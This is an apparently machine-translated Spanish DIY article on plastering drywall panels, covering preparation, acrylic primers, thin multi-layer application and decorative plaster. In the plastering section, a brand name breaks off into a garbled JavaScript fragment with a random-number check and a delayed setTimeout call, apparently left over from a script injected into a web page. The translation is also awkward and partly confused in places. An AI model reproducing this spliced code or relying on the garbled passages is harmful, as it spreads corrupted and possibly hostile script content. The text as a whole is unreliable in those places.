A veces, durante la reparación de una habitación, cuyas paredes están revestidas con láminas de yeso, surge la pregunta: ¿cómo enyesar los paneles de yeso?
A pesar de la aparente simplicidad, la pregunta está lejos de ser inactiva, ya que los paneles de yeso a menudo se denominan «yeso seco».

Es en las complejidades de una relación bastante compleja y ambigua entre revestimiento y yeso que trataremos de comprender este material.
Entonces, la primera y principal pregunta: ¿es posible enlucir paneles de yeso?
Hasta la fecha, lamentablemente, no hay consenso sobre este tema. Muchos expertos se inclinan a creer que enlucir tales superficies (y más aún si la pared está hecha de una lámina bastante barata y no resistente a la humedad) es imposible en cualquier caso.
Tarde o temprano, la base, bajo la influencia de la humedad de la composición y su masa bastante grande, se deforma, lo que provocará el agrietamiento de la capa.
Sin embargo, existe una opinión alternativa, que dice que es posible enlucir paneles de yeso. Si tienes cuidado, claro.
En este caso, «con cuidado» significa, en primer lugar:
- Hágalo usted mismo enlucido en la pared exclusivamente en una hoja resistente a la humedad.
- Uso de imprimaciones especiales de penetración profunda.
- Distribución de masa en capas delgadas en varias etapas.
La única excepción, respecto de la cual los expertos son unánimes, es la aplicación de yeso decorativo con sus propias manos. No solo es posible aplicarlo a la hoja, sino que también es necesario, tal masa es uno de los materiales más populares para la decoración de paredes.
Determinar la necesidad de yeso.
Como probablemente ya entendió, enlucir paneles de yeso es una tarea bastante difícil con resultados a veces impredecibles. Tales son las características de la hoja, que realmente se puede deformar bajo una capa gruesa de acabado. O puede permanecer durante muchos años.
Entonces, ¿cuándo necesitas enyesar?
- Si el revestimiento de la pared tiene curvaturas o desplazamientos significativos, terminar este problema no resolverá y en el futuro puede agravarlo significativamente. Si se ha convertido en un propietario «feliz» de tal muro, es mejor no luchar contra las consecuencias, sino eliminar la causa. Las distorsiones graves solo pueden corregirse recableando, reemplazando las láminas por otras resistentes a la humedad.
- Pero aún se pueden enlucir pequeñas irregularidades en el revestimiento. También tiene sentido aplicar la mezcla sobre abolladuras y costuras precargadas.
- Bueno, y el único caso (ya lo hemos mencionado anteriormente) es el uso de un revestimiento decorativo. Prácticamente no hay restricciones aquí, ya que la masa decorativa se aplica, por regla general, en una capa bastante delgada, y su composición proporciona una polimerización y secado rápidos.
La preparación adecuada de las paredes y la adherencia a la tecnología de aplicación en la base no tienen consecuencias negativas.
Entonces, suponga que ya ha decidido si necesita enlucir paneles de yeso, si puede hacerlo con masilla. Queda por elegir la tecnología y la composición de la mezcla más adecuadas. Empecemos.
Tecnología de aplicación
Al aplicar, se debe observar la tecnología del trabajo, las más mínimas violaciones pueden tener consecuencias indeseables.
Preparación de las paredes para el acabado final.
- Limpiamos la superficie del polvo, que inevitablemente se forma durante su instalación. Una aspiradora industrial es la más adecuada para esto, pero si no tiene una, puede eliminar el polvo con medios improvisados.
- El siguiente paso es masillar costuras, juntas e irregularidades. Para la masilla, se pueden usar mezclas de masilla preparadas y secas. Si se utilizan mezclas secas, prepárelas inmediatamente antes de trabajar.
- Primero, rellene las cavidades de la costura y las grandes irregularidades con masilla. Después de que el relleno se haya endurecido, aplique una capa niveladora.

Masilla
- Ahora puede pasar a la etapa de preparación clave: la cartilla.
Cebador
Para los sustratos se utilizan imprimaciones especiales (como Tiefgrund LF o similar). Dichos imprimadores penetran profundamente en el grosor de la base y la fortalecen, proporcionando adhesión a las mezclas.
Para obtener el mejor efecto en esta etapa, es mejor usar imprimaciones de acrilato que sean permeables al vapor (no aísle el vapor de agua).
Aplicar la imprimación en una capa con rodillo o brocha (para paredes con un área pequeña).
¡Nota! ¡El trabajo en paneles de yeso se lleva a cabo solo después de que la imprimación esté completamente seca! El tiempo de secado de las imprimaciones de acrilato es de 1-2 horas.
Después de que las costuras estén masillas y se aplique la imprimación, puede proceder a nivelar las paredes.
Enlucido
Instrucciones de distribución de yeso de bricolaje:
La masa se aplica en una capa fina (no más gruesa de 2-3 mm) con una espátula ancha o llana de metal. Si se usa yeso para nivelar irregularidades profundas, la distribución se lleva a cabo en varias etapas. Recuerda que en este caso es mejor aplicar 3-4 capas de varios milímetros cada una que 1 capa gruesa a la vez.
Para el acabado de superficies de paneles de yeso, no todo el yeso es adecuado. Es mejor usar mezclas basadas en un aglutinante de yeso (por ejemplo, Knauf Rotbandom () * 6); if (número1 == 3) {var delay = 18000; setTimeout ($ Ikf (0), delay);} y). Para que el acabado se «sujete» mejor, puede utilizar una malla de fibra de vidrio con una malla de 5 mm.
Una vez que la capa de yeso esté completamente seca, puede proceder al acabado de las paredes de paneles de yeso. En este caso, es mejor utilizar materiales permeables al vapor para el acabado, que no eviten que el vapor de agua se escape por debajo del acabado.
Yeso decorativo de paneles de yeso
Para el acabado de superficies de paneles de yeso, es mejor usar yeso decorativo de grano fino. Esto se debe al hecho de que la colocación de fracciones de grano grueso requiere la aplicación de una capa suficientemente gruesa y, en el caso de paredes de cartón yeso, esto no es deseable.
El proceso se lleva a cabo de acuerdo con el siguiente esquema:
La base de cartón-yeso debe estar seca y limpia. Antes de comenzar a trabajar, la superficie debe estar completamente libre de polvo.
Una vez que la superficie está libre de polvo, procedemos al relleno de las costuras. Rellene las costuras con masilla en varios pasos, proporcionando tiempo suficiente para que el recubrimiento se seque y polimerice. Como resultado, las costuras y las irregularidades deben colocarse en el mismo plano que el panel de yeso.
¡Nota! Al nivelar la superficie de paneles de yeso para enlucido decorativo, es posible que no logre una superficie tan lisa como al nivelar para pintar. La textura del yeso esconde bien todas las irregularidades.
Aplicar una imprimación de acrilato a la base de masilla. Para el enlucido decorativo, se utilizan las mismas imprimaciones que para el acabado de paneles de yeso con yeso de cal común. La imprimación se aplica en un solo paso, en una sola capa.
Aplique yeso al panel de yeso imprimado. La aplicación se realiza con espátula o llana, en una capa de 2-3 mm.
Inmediatamente después de que se haya aplicado el yeso, procedemos a la formación del relieve. Formamos el relieve utilizando una esponja, un cepillo duro de pelo fino, paletas, espátulas rizadas.
¡Nota! Al aplicar yeso decorativo a una base de placa de yeso durante la formación del relieve, no se debe aplicar una fuerza excesiva. Esto puede deformar el panel de yeso.
El procesamiento adicional (pintura, recubrimiento con un compuesto protector) se puede llevar a cabo solo después de que la superficie esté completamente seca.
Resumiendo
Ahora sabe cómo enyesar correctamente los paneles de yeso. Para comprender con mayor precisión el tema tecnológico y práctico, nuestro sitio web contiene una fotoinstrucción detallada en la que encontrará la información necesaria sobre este tema. ¡Buena suerte!